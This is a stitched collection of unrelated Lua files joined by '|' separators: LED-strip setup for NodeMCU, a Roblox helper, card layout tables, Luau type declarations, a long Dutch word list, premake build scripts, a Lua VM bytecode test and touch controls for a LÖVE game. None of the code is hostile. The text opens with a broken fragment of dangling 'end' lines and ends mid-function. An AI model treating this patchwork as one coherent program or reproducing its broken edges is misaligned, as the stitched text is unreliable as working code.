-- Sets player speed (SPEED_POWERUP)
-- CountDown = registertimer(1000, "BeginCountDown")
end
end
end
end |
return function()
dofile('wsconsole.lua')()
leds = require 'leds'
sat = 255
val = 255
total = 101
ws2812.init()
buf = ws2812.newBuffer(total, 3)
buf1 = ws2812.newBuffer(total, 3)
buf2 = ws2812.newBuffer(total, 3)
buf:fill(255,255,255)
buf1:fill(0,0,0)
buf2:fill(0,0,0)
buf:set(1, 0, 0, 0)
ws2812.write(buf)
timers = {}
mode = function(mode_name)
local _mode = ldfile(mode_name .. '.lua')
if _mode then _mode() end
end
clr_timers = function()
while #timers > 0 do
local tt = table.remove(timers)
tt:unregister()
end
end
timer=tmr.create()
timer:alarm(500, tmr.ALARM_AUTO, function() timer:interval(100000); ldfile('any.lua')() end)
end
|
local Workspace = game:GetService("Workspace")
return function()
local currentCamera = Workspace.CurrentCamera
return currentCamera.ViewportSize
end |
local Fonts = require 'scripts.composer.fonts'
local Layouts = {}
Layouts.field = { x = 0, y = 0, w = 512, h = 512 }
Layouts.anime = {
art = { x = 13, y = 14, w = 544, h = 582, blur = 4 },
atk = { x = 234, y = 725, w = 157, h = 48,
f = Fonts.get_family("values", "18.7"), ff = Fonts.get_file("values"), a = "high" },
def = { x = 493, y = 725, w = 157, h = 48,
f = Fonts.get_family("values", "18.7"), ff = Fonts.get_file("values"), a = "high" },
lsc = { x = 180, y = 543, w = 75,
f = Fonts.get_family("values", "20"), ff = Fonts.get_file("values"), a = "centre" },
rsc = { x = 390, y = 543, w = 75,
f = Fonts.get_family("values", "20"), ff = Fonts.get_file("values"), a = "centre" },
lkr = { x = 450, y = 732, w = 52,
f = Fonts.get_family("link_rating", "12.5"), ff = Fonts.get_file("link_rating"), a = "low" }
}
Layouts.proxy = {
art = {
regular = { x = 83, y = 185, w = 528, h = 528 },
pendulum = {
m = {
o = { x = 45, y = 182, w = 603, h = 448 },
t = { x = 45, y = 182, w = 603, h = 569 }
},
s = {
o = { x = 45, y = 182, w = 603, h = 484 },
t = { x = 45, y = 182, w = 603, h = 569 }
}
}
},
name = { x = 54, y = 54, w = 512,
f = Fonts.get_family("card_name", "20"), ff = Fonts.get_file("card_name"), a = "low" },
lscale = {
m = { x = 70, y = 695, w = 42,
f = Fonts.get_family("values", "12"), ff = Fonts.get_file("values"), a = "centre" },
s = { x = 70, y = 715, w = 42,
f = Fonts.get_family("values", "12"), ff = Fonts.get_file("values"), a = "centre" }
},
rscale = {
m = { x = 623, y = 695, w = 42,
f = Fonts.get_family("values", "12"), ff = Fonts.get_file("values"), a = "centre" },
s = { x = 623, y = 715, w = 42,
f = Fonts.get_family("values", "12"), ff = Fonts.get_file("values"), a = "centre" }
},
pendulum_effect = {
m = { x = 109, y = 644, w = 475, h = 102, j = true, fs = { 5, 4, 3.5 },
ft = Fonts.get_family("effect"), ff = Fonts.get_file("effect"), a = "low" },
s = { x = 109, y = 680, w = 475, h = 68, j = true, fs = { 5 },
ft = Fonts.get_family("effect"), ff = Fonts.get_file("effect"), a = "low" }
},
monster_desc = { x = 54, y = 766, w = 585,
f = Fonts.get_family("monster_desc", "6.5"), ff = Fonts.get_file("monster_desc"), a = "low" },
flavor_text = { x = 53, y = 794, w = 588, h = 126, j = true, fs = { 5, 4 },
ft = Fonts.get_family("flavor_text"), ff = Fonts.get_file("flavor_text"), a = "low" },
monster_effect = { x = 53, y = 795, w = 588, h = 125, j = true, fs = { 5, 4.5, 4, 3.8, 3.6 },
ft = Fonts.get_family("effect"), ff = Fonts.get_file("effect"), a = "low" },
spelltrap_effect = { x = 53, y = 766, w = 585, h = 180, j = true, fs = { 5, 4.5, 4 },
ft = Fonts.get_family("effect"), ff = Fonts.get_file("effect"), a = "low" },
atk = { x = 500, y = 927,
f = Fonts.get_family("values", "7.25"), ff = Fonts.get_file("values"), a = "high" },
atk_u = { x = 500, y = 927, w = 13, h = 19,
f = Fonts.get_family("values", "12"), ff = Fonts.get_file("values"), a = "high" },
def = { x = 640, y = 927,
f = Fonts.get_family("values", "7.25"), ff = Fonts.get_file("values"), a = "high" },
def_u = { x = 640, y = 927, w = 13, h = 19,
f = Fonts.get_family("values", "12"), ff = Fonts.get_file("values"), a = "high" },
link_rating = { x = 639, y = 927,
f = Fonts.get_family("link_rating", "6.5"), ff = Fonts.get_file("link_rating"), a = "high" },
serial_code = { x = 32, y = 968, w = 120,
f = Fonts.get_family("signature", "4.5"), ff = Fonts.get_file("signature"), a = "low" },
copyright = { x = 631, y = 968, w = 260,
f = Fonts.get_family("signature", "4.25"), ff = Fonts.get_file("signature"), a = "high" }
}
return Layouts
|
--!strict
local actions = require(script.Parent.actions)
type AnyAction = actions.AnyAction
export type Reducer<State = any, Action = AnyAction> = (State?, Action) -> State
export type ReducersMapObject<State = any, Action = AnyAction> = {
-- TODO Luau: used to be [K in keyof S]: K[S]
[string]: Reducer<State, Action>,
}
return nil
|
-- Hives should begin as mature.
local oldOnCreate = Hive.OnCreate
function Hive:OnCreate()
oldOnCreate(self)
self:SetMature()
end |
return {'weg','wegaanduiding','wegaanleg','wegaansluiting','wegafzetting','wegbarricade','wegbebakening','wegbedekking','wegbeheer','wegbeheerder','wegbeplanting','wegbereider','wegbergen','wegberm','wegbezuinigen','wegblazen','wegblijven','wegblijver','wegblijvers','wegblokkade','wegbombarderen','wegbonjouren','wegbranden','wegbreken','wegbrengen','wegcapaciteit','wegcijferen','wegcircuit','wegcode','wegconcurreren','wegdeel','wegdeemsteren','wegdek','wegdelen','wegdempen','wegdenken','wegdoen','wegdoezelen','wegdommelen','wegdraaien','wegdragen','wegdrijven','wegdringen','wegdromen','wegdrukken','wegdrummen','wegduiken','wegduwen','wegebben','wegedoorn','wegedoren','wegel','wegeling','wegen','wegenaanleg','wegenatlas','wegenbelasting','wegenbouw','wegenbouwbedrijf','wegenbouwer','wegenbouwkundige','wegenbouwmachine','wegenbouwpoot','wegenbouwproject','wegenhulp','wegeninfrastructuur','wegenis','wegenkaart','wegennet','wegenonderhoud','wegenplan','wegens','wegenstelsel','wegenstructuur','wegenverkeersreglement','wegenverkeerswet','wegenwacht','wegenzout','weger','wegeren','wegering','wegervaring','wegfietsen','wegfilteren','wegfladderen','wegfluit','wegfrommelen','weggaan','weggappen','wegge','weggebrand','weggebruik','weggebruiker','weggebruikster','weggedeelte','weggedrag','weggeefprijs','weggeefwinkel','weggeklapt','weggeld','weggepest','weggepraat','weggeraakt','weggeregeld','weggeroest','weggeroofd','weggesleurd','weggesluisd','weggestopt','weggetje','weggevangen','weggeven','weggevertje','weggevlucht','weggevoerde','weggeweest','weggewoven','weggieten','wegglijden','wegglippen','weggommen','weggooien','weggraven','weggrissen','weghakken','weghalen','weghangen','weghebben','weghelft','weghelpen','weghollen','weghonen','weghouden','weginfrastructuur','weging','wegingsfactor','wegingsprocedure','wegjagen','wegkampioen','wegkankeren','wegkant','wegkapen','wegkapitein','wegkappen','wegkijken','wegknippen','wegkomen','wegkopen','wegkrijgen','wegkruipen','wegkruis','wegkruisen','wegkruising','wegkwijnen','wegkwijning','weglaatbaar','weglachen','weglaten','weglating','weglatingsstreepje','weglatingsteken','wegleggen','wegleiden','weglekken','weglengte','weglichaam','wegligging','weglokken','wegloophuis','weglopen','wegloper','wegmaaien','wegmaken','wegmarkering','wegmoffelen','wegnemen','wegneming','wegomlegging','wegonderhoud','wegopzichter','wegpakken','wegparcours','wegpesten','wegpikken','wegpinken','wegpiraat','wegpiraterij','wegplukken','wegpoetsen','wegpompen','wegpraten','wegproces','wegprofiel','wegpromoveren','wegrace','wegracer','wegraken','wegreconstructie','wegredeneren','wegregelen','wegrennen','wegrenner','wegrestaurant','wegreus','wegrijden','wegrit','wegroepen','wegroesten','wegrollen','wegrotten','wegrotting','wegruimen','wegruiming','wegrukken','wegsaneren','wegschenken','wegschenking','wegscheren','wegscheuren','wegschieten','wegschoppen','wegschouw','wegschrappen','wegschrijven','wegschuilen','wegschuiven','wegseizoen','wegsijpelen','wegslaan','wegsleepregeling','wegslepen','wegslikken','wegslingeren','wegslinken','wegsluipen','wegsluiten','wegsluizen','wegsmelten','wegsmijten','wegsnellen','wegsnijden','wegsnijding','wegsnoeien','wegsnoepen','wegsoezen','wegspelen','wegsplitsing','wegspoelen','wegspringen','wegspuiten','wegsteken','wegstemmen','wegsterven','wegstoppen','wegstormen','wegstrepen','wegstrijken','wegstromen','wegstuiven','wegsturen','wegsuffen','wegteren','wegtikken','wegtoveren','wegtransport','wegtrappen','wegtreiteren','wegtrekken','wegvagen','wegvak','wegvallen','wegvangen','wegvaren','wegvast','wegvastheid','wegvegen','wegverbinding','wegverbreding','wegverharding','wegverkeer','wegverlegging','wegverlichting','wegversmalling','wegversperring','wegvervoer','wegvervoerder','wegvliegen','wegvloeien','wegvluchten','wegvoeren','wegvoering','wegvreten','wegwaaien','wegwachter','wegwandel','wegwandelen','wegwassen','wegwedstrijd','wegwerken','wegwerker','wegwerkzaamheden','wegwerpaansteker','wegwerpartikel','wegwerpbarbecue','wegwerpcamera','wegwerpcultuur','wegwerpen','wegwerpfles','wegwerpgebaar','wegwerpluier','wegwerpmaatschappij','wegwerpservies','wegwerpverpakking','wegwezen','wegwijs','wegwijsborden','wegwijzer','wegwimpelen','wegwissen','wegwuiven','wegzakken','wegzappen','wegzenden','wegzending','wegzendofficier','wegzetten','wegzinken','wegzuigen','wegzuiveren','wegzwijmelen','wegritsen','wegdistel','weggooiartikel','wegwerpbatterij','wegafsluiting','wegopbreking','wegzagen','wegmasseren','weglezen','wegenvignet','wegennetwerk','wegenverordening','wegingskader','wegwerpmateriaal','wegenbeheer','wegenlegger','wegenpatroon','wegenreglement','wegenwachter','weggeefschaak','wegwerpproduct','wegenverkeerswetgeving','wegentaks','wegwerpeconomie','wegatletiek','wegdrinken','weglekeffect','wegenbouwkunde','wegener','wegman','wegerif','weggen','wegh','wegter','weggelaar','weggeman','wegdam','wegkamp','wegner','wegafsluitingen','wegafzettingen','wegbeplantingen','wegbereiders','wegberg','wegbergt','wegbermen','wegblaas','wegblaast','wegbleef','wegbleven','wegblies','wegbliezen','wegblijf','wegblijft','wegbonjourde','wegbonjourt','wegborg','wegborgen','wegbracht','wegbrak','wegbrand','wegbrandde','wegbrandden','wegbrandt','wegbreekt','wegbreng','wegbrengt','wegcijfer','wegcijferde','wegcijferden','wegcijfert','wegcontroles','wegdacht','wegdeden','wegdeed','wegdekken','wegdenkt','wegdoe','wegdoet','wegdoezel','wegdoezelde','wegdoezelden','wegdoezelt','wegdoken','wegdommel','wegdommelde','wegdommelden','wegdommelend','wegdommelende','wegdommelt','wegdook','wegdraag','wegdraagt','wegdraaiend','wegdreef','wegdreven','wegdrijf','wegdrijft','wegdringt','wegdroeg','wegdroegen','wegdrong','wegdruk','wegdrukt','wegdrukte','wegdrukten','wegduik','wegduikt','wegduw','wegduwde','wegduwden','wegduwt','wegebbend','wegebbende','wegebde','wegebden','wegebt','wegedoorns','wegelingen','wegels','wegeltje','wegeltjes','wegennetten','wegenwachten','wegenwerken','wegerde','wegers','wegert','wegfiets','wegfietst','wegfietste','wegfietsten','wegfloten','wegga','weggaat','weggaf','weggaven','weggeblazen','weggebleven','weggebonjourd','weggebonjourde','weggeborgen','weggebracht','weggebrachte','weggebrande','weggebroken','weggebruikers','weggecijferd','weggecijferde','weggedaan','weggedacht','weggedane','weggedeeld','weggedeelten','weggedeeltes','weggedoezeld','weggedoezelde','weggedoken','weggedommeld','weggedraaid','weggedragen','weggedreven','weggedrongen','weggedrukt','weggeduwd','weggeduwde','weggeef','weggeeft','weggefietst','weggefietste','weggefilterd','weggeflikkerd','weggefloten','weggegaan','weggegane','weggegeven','weggegleden','weggeglipt','weggegooid','weggegooide','weggegoten','weggegraven','weggegrist','weggehaald','weggehaalde','weggehakt','weggehangen','weggehold','weggeholpen','weggehoond','weggehouden','weggejaagd','weggejaagde','weggekankerd','weggekeken','weggeknipt','weggeknipte','weggekocht','weggekochte','weggekomen','weggekropen','weggekruist','weggekwijnd','weggekwijnde','weggelaten','weggelegd','weggelegde','weggeleid','weggeleide','weggelekt','weggelekte','weggelokt','weggelokte','weggelopen','weggemaaid','weggemaaide','weggemaakt','weggemaakte','weggemasseerd','weggemoffeld','weggemoffelde','weggen','weggenomen','weggepakt','weggepeste','weggepikt','weggepikte','weggepinkt','weggepinkte','weggepoetst','weggepompt','weggepompte','weggepromoveerd','weggepromoveerde','weggeraakte','weggereden','weggeredeneerd','weggeredeneerde','weggerend','weggeretoucheerd','weggeroepen','weggerold','weggerolde','weggerot','weggerotte','weggeruimd','weggeruimde','weggerukt','weggerukte','weggesaneerde','weggescheerd','weggeschminkt','weggescholen','weggeschonken','weggeschopt','weggeschopte','weggeschoren','weggeschoten','weggeschoven','weggeschrapt','weggeschrapte','weggeschreven','weggeschuild','weggeslagen','weggesleept','weggesleepte','weggeslenterd','weggesleten','weggeslikt','weggeslingerd','weggeslingerde','weggeslopen','weggesloten','weggesmeten','weggesmolten','weggesneden','weggesneld','weggesnoeid','weggesnoeide','weggesnoept','weggespeeld','weggespoeld','weggespoelde','weggespoten','weggesprongen','weggestemd','weggestoken','weggestopte','weggestormd','weggestorven','weggestoten','weggestreept','weggestreken','weggestroomd','weggestuurd','weggestuurde','weggesuft','weggetjes','weggetrapt','weggetrapte','weggetreiterd','weggetreiterde','weggetrokken','weggevaagd','weggevaagde','weggevallen','weggevaren','weggeveegd','weggeveegde','weggevloeid','weggevloeide','weggevlogen','weggevluchte','weggevoerd','weggevoerden','weggewaaid','weggewaaide','weggewerkt','weggewerkte','weggewist','weggewiste','weggeworpen','weggewuifd','weggezaagd','weggezakt','weggezakte','weggezet','weggezette','weggezogen','weggezonden','weggezonken','weggeebd','weggeebde','weggiet','wegging','weggingen','weggleden','weggleed','wegglijd','wegglijdt','weggooi','weggooide','weggooiden','weggooit','weggoot','weggoten','weggris','weggrist','weggriste','weggristen','weghaal','weghaalde','weghaalden','weghaalt','weghang','weghangt','wegheeft','weghelften','weghelpt','weghing','wegingsfactoren','wegjaag','wegjaagde','wegjaagden','wegjaagt','wegje','wegjes','wegjoeg','wegjoegen','wegkeek','wegkeken','wegkijk','wegkijkt','wegklapbare','wegknip','wegknipt','wegknipte','wegknipten','wegkocht','wegkom','wegkomt','wegkoopt','wegkroop','wegkropen','wegkruip','wegkruipt','wegkruisingen','wegkwam','wegkwamen','wegkwijn','wegkwijnde','wegkwijnden','wegkwijnt','weglaat','weglaatbare','weglatingen','weglatingstekens','wegleg','weglegde','weglegden','weglegt','wegleid','wegleidde','wegleidden','wegleidt','weglekt','weglekte','weglekten','weglezende','wegliep','wegliepen','wegliet','weglok','weglokt','weglokte','weglokten','wegloop','wegloopt','weglopers','wegmaai','wegmaaide','wegmaaiden','wegmaait','wegmaakt','wegmaakte','wegmarkeringen','wegmoffel','wegmoffelde','wegmoffelden','wegmoffelt','wegnam','wegnamen','wegneem','wegneemt','wegomleggingen','wegopbrekingen','wegopzieners','wegpak','wegpakt','wegpakte','wegpakten','wegpink','wegpinkt','wegpinkte','wegpinkten','wegpiraten','wegplukte','wegpraat','wegpraatte','wegraakt','wegraakte','wegraakten','wegreden','wegredeneer','wegredeneerde','wegredeneerden','wegredeneert','wegreed','wegregelt','wegren','wegrende','wegrenden','wegrenners','wegrent','wegriep','wegrijd','wegrijdt','wegritten','wegroep','wegroept','wegrol','wegrolde','wegrolden','wegrolt','wegrot','wegrotte','wegruim','wegruimde','wegruimt','wegruk','wegrukt','wegrukte','wegrukten','wegs','wegscheer','wegscheerden','wegscheert','wegschenk','wegschenkt','wegscheur','wegscheurde','wegscheurden','wegscheurt','wegschiet','wegscholen','wegschonk','wegschonken','wegschoof','wegschool','wegschoor','wegschoot','wegschop','wegschopt','wegschopte','wegschopten','wegschoren','wegschoven','wegschrapt','wegschuif','wegschuift','wegschuilt','wegsla','wegslaat','wegsleep','wegsleept','wegsleepte','wegsleepten','wegslinger','wegslingerde','wegslingerden','wegslingert','wegsloeg','wegsloegen','wegsloop','wegsloot','wegslopen','wegsluip','wegsluipt','wegsluit','wegsmeet','wegsmelt','wegsmijt','wegsmolt','wegsneden','wegsneed','wegsnelde','wegsnelden','wegsnellende','wegsnelt','wegsnijd','wegsnijdt','wegspoel','wegspoelde','wegspoelden','wegspoelt','wegspring','wegspringt','wegsprong','wegsprongen','wegstak','wegstaken','wegsteekt','wegstem','wegstemde','wegstemden','wegstemt','wegsterf','wegsterft','wegstierf','wegstierven','wegstiet','wegstoot','wegstootte','wegstop','wegstopt','wegstopte','wegstopten','wegstoten','wegstreek','wegstreken','wegstrijk','wegstrijkt','wegstroom','wegstroomde','wegstroomden','wegstroomt','wegstuur','wegstuurde','wegstuurden','wegstuurt','wegtransporteurs','wegtrap','wegtrapt','wegtrapte','wegtrapten','wegtrek','wegtrekt','wegtrok','wegtrokken','wegvaag','wegvaagde','wegvaagden','wegvaagt','wegvaar','wegvaart','wegvakken','wegval','wegvalt','wegveeg','wegveegde','wegveegden','wegveegt','wegverleggingen','wegversperringen','wegviel','wegvielen','wegvlieg','wegvliegende','wegvliegt','wegvloei','wegvloeide','wegvloeiden','wegvloeit','wegvlogen','wegvloog','wegvlucht','wegvluchtte','wegvluchtten','wegvoer','wegvoerde','wegvoerden','wegvoeringen','wegvoert','wegwaai','wegwaaide','wegwaaiden','wegwaait','wegwachters','wegwandelde','wegwandelden','wegwandelt','wegwedstrijden','wegwerk','wegwerkers','wegwerkt','wegwerkte','wegwerkten','wegwerp','wegwerpartikelen','wegwerpcameras','wegwerpproducten','wegwerpt','wegwierp','wegwierpen','wegwijze','wegwijzers','wegwis','wegwist','wegwiste','wegwisten','wegwoei','wegwoeien','wegwuif','wegwuifde','wegwuifden','wegwuift','wegzak','wegzakt','wegzakte','wegzakten','wegzend','wegzendingen','wegzendt','wegzet','wegzette','wegzink','wegzinkt','wegzond','wegzonk','wegzonken','wegaanduidingen','wegaansluitingen','wegbarricades','wegbeheerders','wegbezuinigd','wegblokkades','wegcodes','wegdraait','wegdromend','wegenbouwers','wegenbouwmachines','wegenbouwprojecten','wegend','wegende','wegenkaarten','wegenplannen','wegenplans','weggebombardeerd','weggeconcurreerd','weggedeemsterd','weggedroomd','weggedrumd','weggeefprijzen','weggefrommeld','weggegomd','weggekaapt','weggekapt','weggelachen','weggeplukt','weggesaneerd','weggescheurd','weggesijpeld','weggeslonken','weggestemde','weggestoven','weggeteerd','weggetikt','weggetoverd','weggevreten','weggewassen','weggezapt','weggezuiverd','weghad','weghoudt','wegingen','wegkaapt','wegkaapte','wegkampioenen','wegkwijnende','wegloophuizen','weglopende','wegpoetst','wegpompt','wegraces','wegreuzen','wegrijdende','wegrottende','wegschouwen','wegschrijft','wegsplitsingen','wegstervende','wegtrekkende','wegvallende','wegversmallingen','wegvervoerders','wegwerpaanstekers','wegwerpbarbecues','wegwerpflessen','wegwerpgebaren','wegwerpluiers','wegwerpverpakkingen','wegzuigt','weggewimpeld','wegrestaurants','wegedorens','weggevertjes','weggeritst','wegwerpbatterijen','wegdistels','weggooiartikelen','wegseizoenen','weggeefwinkels','wegenwachters','wegenbelastingen','wegwerpcameraatje','wegennetwerken','wegenpatronen','wegenleggers'} |
workspace ("Primordial")
location("./")
defines "_CRT_SECURE_NO_WARNINGS"
configurations { "Debug", "Release" }
platforms "x64"
includedirs {
"./Engine",
"./Engine/Externals/fmod/include",
"./Engine/Externals/fmod/studio/include",
"./Engine/Externals/freetype/include",
"./Engine/Externals/glad/include",
"./Engine/Externals/glfw3/include",
"./Engine/Externals/glm/include",
"./Engine/Externals/imgui/include",
"./Engine/Externals/stb/include",
"./include"
}
filter "platforms:x64"
system "Windows"
architecture "x64"
defines "Win64"
libdirs {
"libs/%{cfg.buildcfg}",
}
filter "platforms:x64"
system "windows"
architecture "x64"
defines "Win64"
filter "system:windows"
systemversion "latest"
defines {
"GLFW_INCLUDE_NONE",
"WINDOWS"
}
linkoptions {
"/subsystem:windows",
"/entry:mainCRTStartup"
}
filter "configurations:Debug"
defines "DEBUG"
runtime "Debug"
symbols "on"
filter "configurations:Release"
defines "NDEBUG"
runtime "Release"
optimize "on"
filter{}
project ("Primordial")
kind "ConsoleApp"
configuration "windows"
targetname ("Primordial")
language "C++"
cppdialect "C++17"
staticruntime "on"
targetdir ("./Build/bin/%{cfg.platform}/%{cfg.buildcfg}")
objdir ("./Build/obj/%{cfg.platform}/%{cfg.buildcfg}")
links {
"capp",
"Externals"
}
files {
"./include/**.h",
"./include/**.hpp",
"./src/**.cpp",
"./Assets/**"
} |
local pkgconfig = require 'pkgconfig'
local LIB_DIR = "lib/"
local RUNTIME_DIR = "runtime/"
local SRC_DIR = "src/"
solution "ToyRaygun"
startproject "ToyRaygun"
configurations { "Release", "Debug" }
filter "system:windows"
architecture "x86_64"
filter "system:macosx"
architecture "ARM64"
systemversion "11.0.0"
filter "configurations:Release*"
defines { "NDEBUG" }
optimize "Speed"
symbols "On"
filter "configurations:Debug*"
defines { "_DEBUG" }
optimize "Debug"
symbols "On"
filter {}
project "ToyRaygun"
kind "ConsoleApp"
language "C++"
cppdialect "C++14"
exceptionhandling "Off"
rtti "Off"
warnings "Default"
characterset "ASCII"
location ("build/" .. _ACTION)
debugdir (RUNTIME_DIR)
defines {
"_THREAD_SAFE",
"NOMINMAX"
}
sysincludedirs {
path.join(LIB_DIR, "bx/include/")
}
includedirs {
SRC_DIR,
path.join(LIB_DIR, "stb/include/")
}
files {
path.join(SRC_DIR, "*.cpp"),
path.join(SRC_DIR, "*.h"),
path.join(SRC_DIR, "engine/*.cpp"),
path.join(SRC_DIR, "engine/*.h"),
path.join(RUNTIME_DIR, "shaders/**.h")
}
filter "configurations:Debug*"
defines {
"BX_CONFIG_DEBUG=1",
}
filter "configurations:Release*"
defines {
"BX_CONFIG_DEBUG=0",
}
filter "system:windows"
includedirs {
path.join(LIB_DIR, "SDL2-2.0.18/include/"),
path.join(LIB_DIR, "bx/include/compat/msvc/"),
path.join(LIB_DIR, "DirectXShaderCompiler/inc/"),
path.join(LIB_DIR, "DirectX/include/")
}
files {
path.join(SRC_DIR, "engine/D3D12/**.cpp"),
path.join(SRC_DIR, "engine/D3D12/**.h"),
path.join(RUNTIME_DIR, "shaders/d3d12/**.hlsl")
}
links {
"d3d12",
"dxgi",
"dxguid",
"d3dcompiler",
path.join(LIB_DIR, "SDL2-2.0.18/lib/x64/SDL2"),
path.join(LIB_DIR, "bx/lib/x64/bxRelease"),
path.join(LIB_DIR, "DirectXShaderCompiler/lib/x64/dxcompiler")
}
postbuildcommands {
"{COPYFILE} \"" .. path.getabsolute(path.join(LIB_DIR, "SDL2-2.0.18/lib/x64/SDL2.dll")) .. "\" \"%{cfg.buildtarget.directory}/SDL2.dll\"",
"{COPYFILE} \"" .. path.getabsolute(path.join(LIB_DIR, "DirectXShaderCompiler/bin/x64/dxcompiler.dll")) .. "\" \"%{cfg.buildtarget.directory}/dxcompiler.dll\"",
"{COPYFILE} \"" .. path.getabsolute(path.join(LIB_DIR, "DirectXShaderCompiler/bin/x64/dxil.dll")) .. "\" \"%{cfg.buildtarget.directory}/dxil.dll\"",
}
filter { "files:**.hlsl" }
flags "ExcludeFromBuild"
filter "system:macosx"
files {
path.join(SRC_DIR, "engine/Metal/**.mm"),
path.join(SRC_DIR, "engine/Metal/**.h"),
path.join(RUNTIME_DIR, "shaders/metal/**.metal")
}
libdirs {
path.join(LIB_DIR, "bx/lib/osx/")
}
links {
"bxRelease",
"Metal.framework",
"MetalPerformanceShaders.framework",
"QuartzCore.framework",
}
-- use if statement so these functions won't be called at all on windows.
if os.host() == "macosx" then
pkgconfig.add_includes("sdl2")
pkgconfig.add_links("sdl2")
end
filter {}
postbuildcommands {
"{COPYDIR} \"" .. path.getabsolute(path.join(RUNTIME_DIR, "shaders")) .. "\" \"%{cfg.buildtarget.directory}\"",
"{COPYDIR} \"" .. path.getabsolute(path.join(RUNTIME_DIR, "textures")) .. "\" \"%{cfg.buildtarget.directory}\""
} |
local bytecode = require "luavm.bytecode"
local vm = require "luavm.vm".native()
function pass(...)
return ...
end
local dump = string.dump(function(...)
print(...)
local r,e = 4,4
local a, b, c = pass(1,2,3)
print(a,b,c)
print(unpack({4,6,2,4}))
local function t()
r = 5
e = 6
end
t()
print(r,e)
local i = 1
while true do
local m = math.random(1,100)
print("iter "..i,m)
if m < 15 then
break
end
i = i+1
end
return false and 1 or 0
end)
--print(vm.lua51.run(bytecode.load(dump),{"h","i",3,4,5}))
local testbc = string.dump(function() return "Hello" end)
local testbcl = bytecode.load(testbc)
local testbco = bytecode.save(testbcl)
assert(testbc == testbco,"Bytecode save test failed, INCONSISTENT!")
print(vm.lua51.run(testbcl))
print(loadstring(testbc)())
print(loadstring(testbco)())
loadfile("hello.lua")()
vm.run(bytecode.load(string.dump(loadfile("hello.lua"))))
local opscalled = 0
vm.run(
bytecode.load(string.dump(function() while true do end end)),
nil,
nil,
nil,
function() opscalled = opscalled+1 if opscalled > 480000 then error("Timeout.",0) end end)
|
local android = {}
androidMove = 0
androidInteract = false
androidVertical = 0
androidEnter = 0
androidEsc = 0
function android.load()
gLeft = {
x = 4,
y = height - 12,
w = 12,
h = 8
}
gRight = {
x = gLeft.x + gLeft.w + 4,
y = gLeft.y,
w = 12,
h = 8
}
gLeft2 = {
x = 2,
y = height/2,
w = 12,
h = 8
}
gRight2 = {
x = gLeft2.x + gLeft2.w + 2,
y = gLeft2.y,
w = 12,
h = 8
}
gUp = {
x = gLeft2.x + gLeft2.w/2 + 2,
y = gLeft2.y - gLeft2.h - 2,
w = 12,
h = 8
}
gDown = {
x = gUp.x,
y = gLeft2.y + gLeft2.h + 2,
w = 12,
h = 8
}
gEnter = {
x = width - 16,
y = height/2 - 4,
w = 12,
h = 8
}
gEsc = {
x = gEnter.x - gEnter.w - 2,
y = gEnter.y,
w = 12,
h = 8
}
gLight = {
x = width - 32,
y = gLeft.y,
w = 12,
h = 8
}
gAct = {
x = width - 16,
y = gLeft.y,
w = 12,
h = 8
}
gSettings = {
x = 1,
y = 1,
w = 7,
h = 7
}
gSettingsBack = {
x = width/2 - 13,
y = height/2 - 8,
w = 26,
h = 12
}
gQuit = {
x = width/2 - 10,
y = height/2 + 8,
w = 20,
h = 12
}
end
function android.update(dt)
local state = gamestates.getState()
if state == "main" then
android.keypressed()
android.keyreleased()
android.light_update(dt)
end
end
function android.draw()
local state = gamestates.getState()
love.graphics.setColor(1,1,1,1)
if state == "main" then
android.light_draw()
if move == true then
love.graphics.setColor(1,1,1,1)
love.graphics.draw(images.gui_left,gLeft.x,gLeft.y)
love.graphics.draw(images.gui_right,gRight.x,gRight.y)
love.graphics.draw(images.gui_light,gLight.x,gLight.y)
love.graphics.draw(images.gui_act,gAct.x,gAct.y)
love.graphics.draw(images.gui_settings,gSettings.x,gSettings.y)
else
love.graphics.setColor(1,1,1,150/255)
love.graphics.draw(images.gui_left,gLeft.x,gLeft.y)
love.graphics.draw(images.gui_right,gRight.x,gRight.y)
love.graphics.draw(images.gui_act,gAct.x,gAct.y)
end
if clock_puzzle == true then
love.graphics.setColor(1,1,1,1)
love.graphics.draw(images.gui_left,gLeft2.x,gLeft2.y)
love.graphics.draw(images.gui_right,gRight2.x,gRight2.y)
love.graphics.draw(images.gui_up,gUp.x,gUp.y)
love.graphics.draw(images.gui_down,gDown.x,gDown.y)
love.graphics.draw(images.gui_enter,gEnter.x,gEnter.y)
love.graphics.draw(images.gui_esc,gEsc.x,gEsc.y)
love.graphics.draw(images.gui_settings,gSettings.x,gSettings.y)
end
end
end
function android.mousepressed(x,y,button,istouch)
local state = gamestates.getState()
if state == "main" then
if button == 1 then
if clock_puzzle == true then
if guiCheck(gLeft2) then
androidMove = -1
elseif guiCheck(gRight2) then
androidMove = 1
elseif guiCheck(gUp) then
androidVertical = 1
elseif guiCheck(gDown) then
androidVertical = -1
elseif guiCheck(gEnter) then
androidEnter = 1
elseif guiCheck(gEsc) then
androidEsc = 1
end
end
if pauseFlag == false then
if guiCheck(gSettings) then
pause.load()
if debug == true then
door_locked = false
end
end
else
if guiCheck(gSettingsBack) then
pause.exit()
end
end
end
end
end
function android.mousereleased(x,y,button,istouch)
end
function guiCheck(gui)
local gui = gui
local x = love.mouse.getX()/ratio
local y = (love.mouse.getY()-ty)/ratio
return x > gui.x and x < gui.x + gui.w and
y > gui.y and y < gui.y + gui.h
end
function guiCheck_touch(id,x,y,gui)
local gui = gui
local x = x/ratio
local y = y/ratio
return x > gui.x and x < gui.x + gui.w and
y > gui.y and y < gui.y + gui.h
end
function android.keyreleased()
if lr_event == 3 then
if androidMove == -1 then
e_c = 1
elseif androidMove == 1 then
e_c = 2
elseif androidInteract == true then
if route == 1 then
if e_c == 1 then
event_route = him_convo
elseif e_c == 2 then
event_route = wait_convo
end
elseif route == 2 then
if e_c == 1 then
event_route = leave_convo
elseif e_c == 2 then
event_route = wait_convo
end
end
lr_event = 4
end
end
end
function android.keypressed()
if move == true then
if pushing_anim == false then
if androidMove == -1 then
if player.moveLeft == true then
player.isMoving = true
end
if player.dir == 1 then
player.dir = -1
child:flipH()
player_push:flipH()
idle:flipH()
end
if ghost_event == "no escape" then
if ghost_chase == false then
ghost_chase = true
end
end
elseif androidMove == 1 then
if player.moveRight == true then
player.isMoving = true
end
if player.dir == -1 then
player.dir = 1
child:flipH()
player_push:flipH()
idle:flipH()
end
if ghost_event == "no escape" then
if ghost_chase == false then
ghost_chase = true
end
end
else
if androidInteract == true then
if currentRoom == images["leftRoom"] or currentRoom == images["rightRoom"] then
if lightOn == false then
player:checkItems()
player:checkDoors()
end
end
if move_chair == false then
if event_find == false then
if lightOn == true then
player:checkItems()
player:checkDoors()
end
else
player:checkItems()
player:checkDoors()
end
end
end
end
